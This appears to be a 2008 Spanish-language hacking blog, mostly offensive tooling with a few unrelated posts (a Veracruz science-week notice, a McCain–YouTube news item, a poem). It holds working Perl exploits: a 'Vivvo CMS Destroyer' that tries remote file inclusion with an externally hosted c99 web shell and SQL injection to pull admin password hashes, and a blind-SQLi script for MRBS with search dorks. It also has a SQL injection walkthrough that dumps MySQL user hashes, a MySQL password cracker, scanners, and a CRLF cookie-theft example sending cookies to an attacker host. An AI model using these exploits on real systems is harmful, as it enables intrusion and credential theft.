#uxmal666@gmail.com
#By Xianur0
#-------------CREDITS-------------
#http://milw0rm.com/exploits/4192
#http://milw0rm.com/exploits/3326
#http://milw0rm.com/exploits/2339
#http://milw0rm.com/exploits/2337
#-------------/CREDITS-------------

print "\n                           Vivvo CMS Destroyer By Xianur0\n";

#-----------CONFIG----------
$SHELL='http://y4m15p33dy.vilabol.uol.com.br/c99.txt';
$textshell = 'C99Shell v.';
#----------/CONFIG----------
 use LWP::UserAgent;
 use Switch;
 my $path = $ARGV[0];
 $path = shift || &uso;
sub uso { print "\nUse: vivvo.pl [URI to Vivvo CMS]\n"; exit;}
 $ua = LWP::UserAgent->new;
 $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
 $req = HTTP::Request->new(GET => $path."/feed.php?output_type=rss");
 $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
 $res = $ua->request($req);
 if ($res->is_success && $res->content =~ "generator") {
&parser($res->content);
 } else {
 $req = HTTP::Request->new(GET => $path."/index.php?feed");
 $req->header('Accept' => 'text/javascript, text/html, application/xml, text/xml, */*');
 $res = $ua->request($req);
 if ($res->is_success && $res->content =~ "generator") {
&parser($res->content);
 }
   else { print "\nError getting data!\n"; exit;}
 }

&backups;


sub parser {
my @datos = split('<generator>Vivvo CMS ', $_[0]);
my @version = split('</generator>', $datos[1]);
$version = $version[0];
if($version[0] == "") {
my @datos = split('<meta name="generator" content="Vivvo ', $_[0]);
my @version = split('" />', $datos[1]);
$version = $version[0];
}
print "Version: ".$version."\n";
if($version < "4") { print "Outdated version of Vivvo CMS!\n"; &desactualizada($version);}
}

sub backups {
 $req = HTTP::Request->new(GET => "$path/backup");
 $req->header('Accept' => 'text/xml');
 $res = $ua->request($req);
 if ($res->is_success) {
if($res->content =~ "<title>Index of /backup</title>") {
print "\n              Backups:\n";
my @datos = split('<a href="', $res->content);
$datos[0] = "";
foreach $archivos (@datos) {
my @archivo = split('">', $archivos);
if($archivo[0] !~ /\?/){print $archivo[0]."\n"; }
}
print "\nUnprotected Directory: $path/backup\n";
 }
}
}

sub rfi {
$vuln = $_[0];
 $req = HTTP::Request->new(GET => "$path/$vuln=$SHELL?");
 $req->header('Accept' => 'text/xml');
 $res = $ua->request($req);
 if ($res->is_success) {
if($res->content =~ $textshell) {
print "RFI Detected!: $path/$vuln=$SHELL?";
 }
}}

sub sql {
$exploit = "pdf_version.php?id=-1%20UNION%20SELECT%201,2,3,password,5,6,username,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24%20FROM%20tblUsers%20where%20userid=1";
 $req = HTTP::Request->new(GET => "$path/$exploit");
 $req->header('Accept' => 'text/xml');
 $res = $ua->request($req);
 if ($res->is_success) {
print "SQL Injection Generated: $path$exploit";
}
}

sub blind {
for($i=1; $i<32;$i++) {
for($o=30; $o<102;$o++) {
$injection = "$path/index.php?category=/**/AND/**/(ascii(substring((SELECT/**/password/**/FROM/**/tblUsers/**/WHERE/**/userid=1),".$i.",1))=".$o;
 $req = HTTP::Request->new(GET => $injection);
 $req->header('Accept' => 'text/xml');
 $res = $ua->request($req);
 if ($res->is_success) {
if($res->content != "") {
print "Blind Done Correctly!: $injection";
 }
}
}}}

sub desactualizada {
$version = $_[0];
 switch ($version) {
   case "3.4"    { print "Blind SQL Injection trying ....\n"; &blind; print "Intentando RFI....\n"; &rfi('include/db_conn.php?root');}
   case "3.2"    { print "RFI trying ....\n"; &rfi('index.php?classified_path'); print "SQL Injection....\n"; &sql;}
       else { print "There is no registration for this Exploit Version! : (\n";}
   }
}

http://milw0rm.com/exploits/6789

Blind SQL Injection in MRBS (Meeting Room Booking System)

2008-10-17T18:25:00.000-07:00

"MRBS is a system for multi-site booking of meeting rooms. Rooms are grouped by building/area and shown in a side-by-side view. Although the goal was initially to book rooms, MRBS can also be used to book any resource (computer, planes, whatever you want)".

Web CMS: http://sourceforge.net/projects/mrbs/
Affected: Previous versions of mrbs 1.4
Solution: Update to Version 1.4

Doorks:
"Meeting Room Booking System" "month.php?area="
"Meeting Room Booking System" "day.php?area="
"Meeting Room Booking System" "week.php?area="

Author: Xianur0
Try: http://www.sitio.com/path/month.php?area=1/**/and/**/1=0

Exploit:

Código:

#!/usr/bin/perl

#Xianur0 CYS # perl blind.pl http://www.victima/st/schedule/ 'SELECT user()'
#
#Exploit MRBS By Xianur0
#
#Please Have Patience, The Blind SQL Injection is running.........
#pma@localhost
#
#
#Finished!
#


# By Xianur0

use LWP::UserAgent;

%ascii = ("32", " ","32", " ","33", "!","34", '"',"35", "#","36", '$',"37", "%","38", "&","39", "'","40", "(","41", ")","42", "*","43", "+","44", ",","45", "-","46", ".","47", "/","48", "0","49", "1","50", "2","51", "3","52", "4","53", "5","54", "6","55", "7","56", "8","57", "9","58", ":","59", ";","60", "<","61", "+","62", ">","63", "?","64", '@',"65","A","66","B","67","C","68","D","69","E","70","F","71","G","72","H","73","I","74","J","75","K","76","L","77","M","78","N","79","O","80","P","81","Q","82","R","83","S","84","T","85","U","86","V","87","W","88","X","89","Y","90","Z","95","_","97", "a", "98", "b", "99", "c", "100", ,"d","101","e", "102", "f", "103","g", "104", "h", "105","i", "106", "j", "107","k", "108", "l", "109","m", "110", "n", "111","o", "112", "p", "113","q", "114", "r", "115","s", "116", "t", "117","u", "118", "v", "119","w", "120", "x", "121","y", "122", "z");

$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 Firefox/2.0.0.17");
$url = $ARGV[0];
$sql = $ARGV[1] || die("Use: blind.pl [Complete URL] [SQL Injection]\nExample: blind.pl http://www.victima.com/mrbs/ 'SELECT TABLE_NAME FROM INFORMATION_SCHEMA.TABLES'\n");
print "\nExploit MRBS By Xianur0 \n\nPlease Have Patience, The Blind SQL Injection is running.........\n";
$caracter = 1;
$i=0;
$detector = '<h1>No rooms defined for this area</h1>';
$simbolo = ">";
while($caracter ne "finito") {
$req = HTTP::Request->new(GET => $url.'/month.php?year=2008&month=08&area=1%20AND ascii(substring(('.$sql.'),'.$caracter.',1)) '.$simbolo.' '.$i);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
   if($res->content !~ $detector) {
if($base eq $i) { print "$ascii{$i}"; $caracter++; $i=0; $simbolo = ">";}
$base = $i;
$i = $i+10;
} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";}
}
} else {
   print "\nError detected in HTTP requests: " . $res->status_line . "!\n";
}
}

print "\nFinished!\n";


http://milw0rm.com/exploits/6781

15ª Semana Nacional de Ciencia y Tecnología en Veracruz

2008-10-16T17:20:00.000-07:00

En la Semana Nacional de Ciencia y Tecnología (SNCT), niños y jóvenes conocen las múltiples posibilidades que ofrecen las áreas de la ciencia en los campos de la actividad productiva, la investigación científica y la docencia; su misión es promover la ciencia y proyectarla como pilar fundamental del desarrollo económico, cultural y social de nuestro país. Comparten este propósito las instituciones educativas, asociaciones científicas, secretarías de estado, empresas, centros de investigación, museos de ciencia y gobiernos estatales.

La SNCT se realizará del 20 al 24 de octubre en todo el territorio nacional y se concreta en eventos creativos y propositivos de científicos, maestros, divulgadores y empresarios mediante ciclos de conferencias, talleres, exposiciones, demostraciones, visitas guiadas, concursos y ferias científicas, entre otros.

En el estado de Veracruz coordinan la SNCT el Consejo Veracruzano de Ciencia y Tecnología (Covecyt), la Universidad Veracruzana (UV), el Instituto de Ecología (Inecol), las secretarías de Educación en Veracruz (SEV) y de Educación Pública (SEP), la oficina del Conacyt en el estado, los ayuntamientos de Xalapa, Banderilla y Coatepec, con el apoyo de las autoridades educativas estatales, entre otros.

Actividades en Xalapa

La inauguración será el lunes 20 de octubre a las 18:00 horas en el Palacio Municipal, con el mensaje de bienvenida del alcalde David Velasco Chedraui. Acto seguido, autoridades del Conacyt, Covecyt, UV, SEV, SEP y del Fondo de Cultura Económica (FCE) entregarán reconocimientos a alumnos destacados en eventos científicos nacionales.

Posteriormente, Zaira Domínguez Esquivel, investigadora de la Unidad de Servicios de Apoyo de Resolución Analítica de la UV, dará un mensaje a los asistentes. Se cierra el evento con un concierto de la Orquesta Municipal de Xalapa.

Al día siguiente se inauguran los Espacio de Ciencia y Tecnología en Xalapa, Banderilla y Coatepec.
En Xalapa el Espacio de Ciencia y Tecnología será el Centro Recreativo Xalapeño, del martes 21 al jueves 23 de octubre, en horario de 10:00 a 14:00 y de 17:00 a 20:00 horas, con las siguientes actividades:
El martes se hará la presentación de la convocatoria 2009 “Leamos la Ciencia para Todos” para estudiantes de secundaria, bachillerato y universidad. Durante todo el día habrá charlas de divulgación científica, así como los talleres “Juguemos con la ciencia” y “Manejo de residuos: integrando conocimiento y práctica para el cuidado ambiental”, dirigidos a docentes y padres de familia. Se podrá recorrer la exposición de prototipos tecnológicos de las diferentes instituciones de educación.

El miércoles se ofrecen charlas de divulgación científica impartidas por investigadores de la UV y el Inecol, con temas interesantes como “La basura, un problema o una oportunidad” o “Una aproximación al protométodo (o cómo hacer chilaquiles sin quemarlos)”, con los Camaradas de la Ciencia. Se organizan los talleres “Manejo de residuos: Integrando conocimiento y práctica para el cuidado ambiental” y “Una ruta hacia la lectura de la ciencia” y continúa la exposición de prototipos tecnológicos.

El jueves siguen charlas de divulgación científica como “Robótica Didáctica”; también los talleres “Lectura y creatividad”, “Las ciencias y el ámbito cotidiano” y “Separa, aprende, diviértete y salva al planeta”. La exposición de prototipos tecnológicos, “El Bingo de la Ciencia”, y la obra de teatro La ciencia no es como la pintan… de rojo. La versión del Lobo y la caperucita…roja.

Informes con Adalberto Fox al correo afox@uv.mx, o al teléfono 817-40-57.

Periodismo científico

Martín Bonfil, de la Dirección de Divulgación Científica de la UNAM, ofrecerá del 20 al 22 de octubre, de 10:00 a 14:00 horas, el III Curso de Periodismo Científico, dirigido a los profesionales de los medios de comunicación del estado, en la sala de videoconferencias de la Dirección de Investigaciones de la UV en Xalapa, con transmisión a las salas de videoconferencias de Poza Rica, Coatzacoalcos, Boca del Río y Orizaba. Inscripciones gratuitas al correo covecyt@gmail.com con Heriberto Contreras, o al teléfono 841-36-70.

Espacio de Ciencia y Tecnología en Banderilla

Las actividades serán en “La casa del abuelo” en el centro de Banderilla, del miércoles 22 al viernes 24 de octubre, de 9:00 a 12:00 horas, y se ofrecerán talleres científicos simultáneos como las Olimpiaguas;

¿Está claro?; Hidráulica colonial; Uniéndose; Ramificaciones y Visualizando el agua subterránea. También se hará la proyección de videos, una presentación de prototipos tecnológicos, así como talleres para docentes.

En esta sede se hará la clausura oficial de la SNCT el día viernes con la presentación de las convocatorias a los concursos infantil y juvenil “Imagina la ciencia y la tecnología”. Coordina Gloria Jiménez, al correo jimmoreg@hotmail.com

También en Coatepec

En el Palacio Municipal, el lunes 20 de octubre se llevará a cabo el programa de la SNCT, iniciando con un mensaje de Sergio Ramírez Cabañas, presidente municipal, después de la conferencia que ofrecerá Gerardo Mata Montes de Oca, secretario técnico del Inecol. A las 11:00 horas se presentará la obra de teatro Alpha: un pedacito de cielo, y posteriormente se hará un recorrido por la exposición de prototipos del CBTIS 165.

Habrá un concurso de dibujo infantil y la Carrera de la Semana de la Ciencia. Cerrando con música veracruzana con el grupo “Zarambeaque”. Coordina en Coatepec Guadalupe López gplopez@ecologia.edu.mx

Simultáneamente en todo Veracruz y el país, las diferentes instituciones educativas, ayuntamientos, empresas y dependencias gubernamentales organizan actividades similares que permitan fomentar entre la población el interés por la ciencia y la tecnología. La invitación es a participar y sumarse a esta labor que beneficia a nuestros niños y jóvenes.

La programación detallada se podrá consultar en la página www.cienciaenveracruz.blogspot.com

Una opinión Persona: Creo que por ahí verán a Xianur0 Haciendo desastre entre la multitud, aunque me párese algo bastante vació....

Se queja McCain con YouTube

2008-10-16T17:18:00.000-07:00

YouTube, el sitio de difusión de videos por internet, rechazó una petición para revisar sus políticas y dejar de remover en forma expedita videos de campaña del republicano John McCain que pudieran infringir leyes de derecho de autor.

Los videos de campaña de McCain han sido removidos con frecuencia por YouTube, tras recibir quejas de que algunos infringen las leyes de derecho de autor al utilizar imágenes y audios de debates de televisión y discos protegidos, sin contar con los permisos para ello.

El asesor legal de la campaña de McCain, Trevor Potter, envió esta semana una carta a los ejecutivos de YouTube y de Google, en la que solicitó una 'completa revisión legal' de las notificaciones de remoción interpuestas contra los vídeos colocados por las campañas políticas.

YouTube está protegido por el Acta Digital del Milenio sobre Derecho de Autor (DMCA, por sus siglas en inglés), de tener responsabilidad por difundir material ilegal, siempre y cuando la compañía actué y lo remueva cuando sea notificada de un video que infringe el derecho de autor.

Aun así, YouTube enfrenta demandas de parte de compañías distribuidoras de discos y videos, de infringir las leyes de derecho de autor.

En la respuesta a la carta de la campaña de McCain, el abogado en jefe de YouTube, Zahavah Levine, explicó la dificultad que tienen jueces y abogados sobre lo que constituye un uso justo de los materiales con derecho de autor.

'Ningún número de abogados puede posiblemente determinar con un nivel razonable de certitud si todos los vídeos de los que recibimos quejas para que sean removidos califican como de uso justo', dijo Levine.

'La DMCA provee una salvaguarda de seguridad estatutaria para proveedores de servicio como YouTube que albergan contenido', explicó.

'Sin esta salvaguarda de seguridad, sitios como YouTube no pudieran existir. El problema real aquí es las entidades e individuos que abusan el proceso de la DMCA', agregó el abogado de la compañía.

McCain, quien se encuentra abajo en las encuestas y ha sido sobrepasado en gastos de publicidad por su contrincante, el demócrata Barack Obama, busca mantenerse vivo y sin menoscabo en el poderoso canal de difusión que significa YouTube.

En la actual contienda electoral en Estados Unidos, YouTube está robando en forma importante audiencias a las cadenas nacionales de televisión, al convertirse en un sitio casi imprescindible para las campañas políticas.

De acuerdo con el Centro de Investigación Pew, un 35 por ciento de los estadunidenses encuestados en la primavera pasada indicaron haber visto vídeos relacionados a las campañas políticas tres veces más que en 2004.

Jaquemate

2008-09-27T11:36:00.001-07:00

Se que no cree este Blog para esto, pero quiero que comprendan un poco el por que de mis acciones.... un Verso de mi autoria:

Sueña que hay por que vivir
sueña que alguien te regalara una emoción
sueña que alguien cree en ti
aunque simplemente te quieran destruir
sin importar lo que piensen nosotros existimos
no somos nadie al nacer
solo queda ser leyenda
no somos nadie si nada hacemos
juega este juego que es la vida
cree en que hay esperanza, pero no la hay
has de este mundo tu tablero
no temas mover las piezas del destino
tan solo gana
no temas sacrificar algo
por que nada es permanente
al final en esta vida el juego es sobrevivir
Eres dios o solo un perdedor?
Ganadores somos los que queremos serlo
y los demás nuestros peones
En este juego del destino solo queda ganar o morir
Al Final una explosión pasajera de imágenes
Que con Mi puño cambiare
Forja el Destino cual espada
Y Recuerda por que estas aquí
Aprende de tus errores y Gana la partida
La Victoria es nuestra
Tu alma me pertenecerá si te equivocas
Nadie esperara tu turno
Siempre eres vulnerable
Haste fuerte o Muere
Por que el Juego Comienza!

No seré Tan Solo Un Peón!

Crackeador password() MySQL

2008-09-25T17:32:00.000-07:00

Por Correo me pidieron el crackeador con insistencia, así que en un tiempo libre que logre hacerme, hice este crackeador, el cual necesita una base de datos txt y un servidor MySQL (sirve permisos nobody):

<html>
<body>
<?php
$server = "localhost";
$usuario = "nobody";
$password = "";
$diccionario = "diccionario.txt";
if(is_array($_GET['hash'])) { print "Intento de Path Disclosure Detectado!\n"; exit; } else { $hash = $_GET['hash'];}
if(eregi("[SELECT]+[UNION]+[AND]+[OR]+[)]", $hash)) exit;
htmlentities($hash);
$link = mysql_connect($server, $usuario, $password);
if(!mysql_real_escape_string($hash, $link)) exit;
$archivo = file($diccionario);
foreach($archivo as $n=>$linea) {
$resultado = mysql_query("SELECT password('$linea')", $link);
while ($row = mysql_fetch_row($resultado)){
if($row[0] == $hash) {
die("<b>Password Encontrada:</b> $linea\n<br><b>Passwords Probadas:</b> $n\n<br>");
}
}}
?>
</body>
</html>

Ejemplo:

http://127.0.0.1/crackeador.php?hash=*E30E2ECBF3FC6D46D4239C068C14E6A202B1019B

Resultado:

Password Encontrada: xianur0
Passwords Probadas: 0

(lo encontró en el primer dato que leio xD...)

Testeando MySQL Mediante Bases de Datos Default

2008-09-22T19:21:00.000-07:00

Suponiendo que tenemos una SQL Injection, pero no encontramos datos útiles, para ello tenemos muchas opciones que muchas veces están por default en los servidores, y otras tablas de administradores de archivos/bases de datos, también nos son útiles:

information_schema
mysql
etc....

Comenzaremos con la information_schema:

Tablas:

CHARACTER_SETS
COLLATIONS
COLLATION_CHARACTER_SET_APPLICABILITY
COLUMNS
COLUMN_PRIVILEGES
KEY_COLUMN_USAGE
PROFILING
ROUTINES
SCHEMATA
SCHEMA_PRIVILEGES
STATISTICS
TABLES
TABLE_CONSTRAINTS
TABLE_PRIVILEGES
TRIGGERS
USER_PRIVILEGES
VIEWS

Comenzaremos identificando las tablas que hay y en que DB's se encuentran, pero para ello necesitamos un script vulnerable para practicar:

Estructura de la DB:

use test;
CREATE TABLE `usuarios` (
`id` int(11) NOT NULL auto_increment,
`nombre` varchar(180) NOT NULL default '',
`email` varchar(50) NOT NULL default '',
PRIMARY KEY (`id`)
);
insert into usuarios values
(1, 'xianur0', 'uxmal666@gmail.com');
insert into usuarios values
(2, 'UxMal', 'uxmal666@gmail.com');

vuln.php

<?php
$id = $_GET['id'];
$conexion = mysql_connect("localhost", "xianur0","mipassword");
mysql_select_db("test", $conexion);
$consulta = "SELECT * FROM usuarios Where id = $id";
$resultado = mysql_query($consulta, $conexion) or die(mysql_error());
$todo = mysql_num_rows($resultado);
if ($todo> 0) {
$row = mysql_fetch_assoc($resultado);
echo "<strong>".$row['id']."</strong><br>";
echo "Nombre: ".$row['nombre']."<br>";
echo "Email: ".$row['email']."<br><br>";
}
?>

Hacemos la Consulta: http://127.0.0.1/vuln.php?id=1

Resultado:

1
Nombre: xianur0
Email: uxmal666@gmail.com

Comenzamos a Inyectar:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/1,1

Resultado:
The used SELECT statements have a different number of columns

Podemos usar el fuzzer que también esta en este blog o hacerlo manualmente (como prefieran):

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/1,1,1

Resultado:

1
Nombre: 1
Email: 1

Comenzamos a Sacar Datos:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/1,2,table_name/**/FROM/**/information_schema.tables

Resultado:

1
Nombre: 2
Email: CHARACTER_SETS

Bueno al no haber un error SQL y al responder con el nombre de una tabla, quiere decir que existe information_schema (valgame la redundancia), sigamos inyectando:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,2,table_name/**/FROM/**/information_schema.tables

Donde: TABLE_SCHEMA es la DB y table_name es el nombre de la tabla.

Resultado:

information_schema
Nombre: 2
Email: CHARACTER_SETS

ya tenemos la primera tabla de esa DB (el information_schema no esta considerando la DB test).

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,2,table_name/**/FROM/**/information_schema.tables/**/WHERE/**/table_name/**/NOT/**/IN/**/('CHARACTER_SETS')

Resultado:

information_schema
Nombre: 2
Email: COLLATIONS

ahora que si lo que queremos es saber cuales bases de datos existen:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,2,table_name/**/FROM/**/information_schema.tables/**/WHERE/**/TABLE_SCHEMA/**/NOT/**/IN/**/('information_schema')

Resultado:

mysql
Nombre: 2
Email: db

Bueno tenemos ya 2 bases de datos:
mysql e information_schema, sigamos:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,2,table_name/**/FROM/**/information_schema.tables/**/WHERE/**/TABLE_SCHEMA/**/NOT/**/IN/**/('information_schema','mysql')

Resultado:

phpmyadmin
Nombre: 2
Email: xianur0_bookmark

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,2,table_name/**/FROM/**/information_schema.tables/**/WHERE/**/TABLE_SCHEMA/**/NOT/**/IN/**/('information_schema','mysql','phpmyadmin')

Resultado:

test
Nombre: 2
Email: usuarios

Bueno ahí esta la tabla inicial y la DB inicial...

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,2,table_name/**/FROM/**/information_schema.tables/**/WHERE/**/TABLE_SCHEMA/**/NOT/**/IN/**/('information_schema','mysql','phpmyadmin','test')

Y ahora no nos devolverá nada (ya no hay base de datos), ahora vamos por columnas:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME/**/FROM/**/information_schema.columns

Resultado:

information_schema
Nombre: CHARACTER_SETS
Email: CHARACTER_SET_NAME

No es de gran utilidad esa informacion, pero si hacemos una sentencia mas exacta:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME/**/FROM/**/information_schema.columns/**/WHERE/**/TABLE_SCHEMA/**/=/**/'test'

Resultado:

test
Nombre: usuarios
Email: id

Base de datos: test
Tabla: usuarios
Columna: id

Esto funciona como queremos por que solo existe una tabla en nuestra base de datos test, pero si existiese mas de una tabla y queremos saber específicamente las columnas de la tabla usuarios:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME/**/FROM/**/information_schema.columns/**/WHERE/**/TABLE_SCHEMA/**/=/**/'test'/**/AND/**/TABLE_NAME/**/=/**/'usuarios'

ahora saquemos la siguiente:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME/**/FROM/**/information_schema.columns/**/WHERE/**/TABLE_SCHEMA/**/=/**/'test'/**/AND/**/TABLE_NAME/**/=/**/'usuarios'/**/AND/**/COLUMN_NAME/**/NOT/**/IN/**/('id')

Resultado:

test
Nombre: usuarios
Email: nombre

Yo se que hay mil y una forma de obtener este resultado, pero no iré a conceptos, simplemente hablare de la técnica.

Ahora que para sacar las DB hay una forma mas facil (también basándose en el information_schema), esta otra forma es mediante la tabla schemata:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/SCHEMA_NAME,DEFAULT_CHARACTER_SET_NAME,DEFAULT_COLLATION_NAME/**/FROM/**/information_schema.schemata

y bueno el resto ya lo saben..

Busquen en google la estructura del information_schema o bien instalen el xampp (ese trae information_schema por default)

Ahora vamos con mysql

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/User,Select_priv,Host/**/FROM/**/mysql.user

Resultado:

root��
Nombre: Y
Email: localhost

podríamos intentar sacar la password, pero no en todos los MySQL Funciona...

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/User,Password,Host/**/FROM/**/mysql.user

xianur0
Nombre: *CEE870801502ACAD44FA46CA2CA4F58C2B721A67
Email: localhost

El password que obtuvimos (si es que lo permitió el MySQL) esta encriptado por la funcion password() de mysql (no dire en este texto como desencriptarlo).

Obtengamos información:

http://127.0.0.1/vuln.php?id=-1/**/UNION/**/SELECT/**/User,Db,Select_priv/**/FROM/**/mysql.db

Resultado:

pma
Nombre: mysql
Email: N

Bueno hasta aquí dejare este texto, pero seguiré escribiendo algunas cosas útiles cuando tenga tiempo....

By Xianur0
http://xianur0.blogspot.com

Buscar Columna Vulnerable con Perl (SQL Injection)

2008-09-22T19:15:00.000-07:00

#!/usr/bin/perl

#By Xianur0
#uxmal666@gmail.com
#http://xianur0.blogspot.com/

use LWP::UserAgent;
$ua = LWP::UserAgent->new;
my $uri = $ARGV[0];
$uri = shift || die("Uso: fuzzer.pl [URI a SQL Injection]\n");
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16");
my $inyeccion = "-10/**/UNION/**/SELECT/**/0";
$uri = $uri.$inyeccion;
print $uri;
for($i=1; $i<1000;$i++) {
$uri = "$uri,$i";
$req = HTTP::Request->new(GET => $uri."/*");
print $uri."/*\n";
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content !~ "mysql_num_rows()") { die("Columna Encontrada: ".$uri."/*\n"); }
} else {
die("Servidor no responde Correctamente!\n"); }
}

Temp Searcher Perl

2008-09-22T19:02:00.000-07:00

Busca Archivos temporales mediante diccionario y mediante spider:...

#!/usr/bin/perl

#Temp Searcher By Xianur0
#uxmal666@gmail.com

use LWP::UserAgent;
use Term::ANSIColor qw(:constants);

$Term::ANSIColor::AUTORESET = 1;
$ua = LWP::UserAgent->new;
my $web = $ARGV[0];
$web = shift || &uso;

sub uso { print "Uso: temsearch.pl [url]\n"; exit;}
$useragent = "Mozilla/5.0 (X11; U; Linux i686; es-ES; rv:1.8.1.15) Gecko/20080623 Firefox/2.0.0.15";
&tempse;
&spider();

sub tempse {
print RED "\nCargando Diccionario....\n";
my $temp;
open(TEMPS, "libs/temps.txt") || die "No existe la DB!\n";
while($temp = <TEMPS>){
chomp($temp);
my @datas = split("/", $web);
if($web =~ "http://") {
$host = $datas[2];
} else { $host = $datas[0];}
$tempurl = "http://".$host."/".$temp;
$req = HTTP::Request->new(GET => $tempurl);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
print "Temp Encontrado: ".$tempurl."\n";
}
}
print RED "\nEjecutando Spider.......\n";
}

sub spider() {

my @nexo = ();
sub tags {
my($tag, %attr) = @_;
return if $tag ne 'a';
push(@nexo, values %attr);
}

$p = HTML::LinkExtor->new(\&tags);
$ua->agent($useragent);
$res = $ua->request(HTTP::Request->new(GET => $web),
sub {$p->parse($_[0])});
if(!$res->is_success) { print YELLOW "\nLa Web No Esta Respondiendo Correctamente!\n"; } else {
my $base = $res->base;
@nexo = map { $_ = url($_, $base)->abs; } @nexo;
foreach $url (@nexo) {
my @dat = split("/", $url);
if($dat[0] eq "") { $url = "http://".$host.$url;}
my @corregido = split(/\?/, $url);
$urls= $corregido[0]."~\n";
if(!$urll[$urls]) {
$urll[$urls] = $urls;
$req = HTTP::Request->new(GET => $urls);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
print "Temp Encontrado: ".$urls."\n";
}
}
spider($urls);
}
}
}

El Diccionario (temps.txt):

index.php~
Settings.php~
sql.php~
sql.php.bak
sql_bak.php~
index.bak
index.php.bak
Settings.php.bak
Settings_bak.php~
db.php~
db.php.bak
db.bak
db_bak.php~

CRLF

2008-09-10T17:00:00.000-07:00

CR: retorno de carro.
Carácter Hexadecimal: 0D.
Carácter Decimal: 13.

LF: Salto de Linea.
Carácter Hexadecimal: 0A.
Carácter Decimal: 10.

CRLF:

Combinación de códigos de control (CR y LF) por la cual se crea una nueva linea.

Explicación Técnica:

Esta combinacion de codigos de control pueden ser usados para crear una nueva linea en metodos computacionales.

Ejemplo:

Código:
<?php

('Location: '.$_GET['page']);
?>

Con ese codigo y la version PHP correcta podriamos crear un header adicional a base de este:

http://www.server.com/vulnerable.php?page=%0D%0ASet-Cookie: isadmin=yes

Con esto la respuesta HTTP seria algo como esto:

Código:

HTTP/1.1 302 Found
Location:
Set-Cookie: isadmin=yes

También podríamos usarlo para robar cookies:

Código:
<?php

include('sessid.php');
$domain = $_REQUEST['uri'];
$id=
header('Set-Cookie: domain='.$domain.'; SESSID='.$id);
?>

Código:

GET http://www.server.com/vulnerable.php?exploit=%0D%0ALocation: http://www.atacante.com/cookies.php?cookie= HTTP/1.1
Host: www.server.com

y la respuesta seria:

Código:

HTTP/1.1 302 Found
Set-Cookie: domain=
Location: http://www.atacante.com/cookies.php?cookie=SESSID=datos

bueno esos son solo ejemplos de esta clase de ataques, ahora vamos a los ejemplos y ataquemos a google news:

Código:

http://news.google.com.mx/news?xianur0%5B%0D%0AXianur0%15Was%10%10%15Here%15%43%4F%44%45%0D%0A%15%48%45%58%5D=%0D%0A

Y en el código fuente podremos encontrar:

Código:

<input type=hidden name="xianur0[
Xianur0 Was  Here CODE
HEX]" value="

como verán hasta los %10 los interpreto .. aparentemente nada mas están filtradas las dobles comillas y los > y < (por el htmlentities que si valora el revisar caracteres hexadecimales).

Extencion de Contenido:

IMAP/SMTP Injection (Gracias a Inyexion por el link)

Error de Manejo Hexadecimal en Google News

2008-09-10T13:39:00.000-07:00

Error de Manejo de Caracteres Hexadecimales en Google News:

Link demostración CRLF:
http://news.google.com.mx/news?xianur0[%0D%0AXianur0%15Was%10%10%15Here%15%43%4F%44%45%0D%0A%15%48%45%58]=%0D%0A

<input type=hidden name="xianur0[
Xianur0 Was  Here CODE
HEX]" value="

Como podrán notar hasta los caracteres en hexadecimal los interpreto, y envió incluso los %10 (DLE).

Bugs SMF

2008-09-08T15:03:00.000-07:00

Algunos Bugs SMF

El Log de Errores guarda básicamente cualquier mínimo error causado por los usuarios, bueno y si lo saturamos?

http://web/foro/index.php?action=help;page[]=loginout
(Full path disclosure)
esto creara un registro de error en el log:

Citar
2: Illegal offset type in isset or empty
Archivo: /var/www/xxxxxxxxxxxxxx.com/htdocs/Sources/Help.php
Linea: 65
?action=help;page[]=loginout

Este error se encuentra en Sources/Help.php en la linea 65:
Código:

if (!isset($_GET['page']) || !isset($context['all_pages'][$_GET['page']]))
$_GET['page'] = 'index';

Parchando:
Bueno esta clase de bugs quedan corregidos con el parche de seguridad que hice para el SMF. Pero igualmente aquí esta el otro de parche que lo corrige (colocar en el index.php arriba de todo (después del <?php y del header de información)

Código:

function juackers() {
echo "<script>alert('desgraciado lammer, que intentas?');</script><h1>Que Lammer Eres!</h1>";
exit();
}
foreach ($_GET as $key => $value) {
if(is_array($_GET["$key"])) {
juackers();
}
}

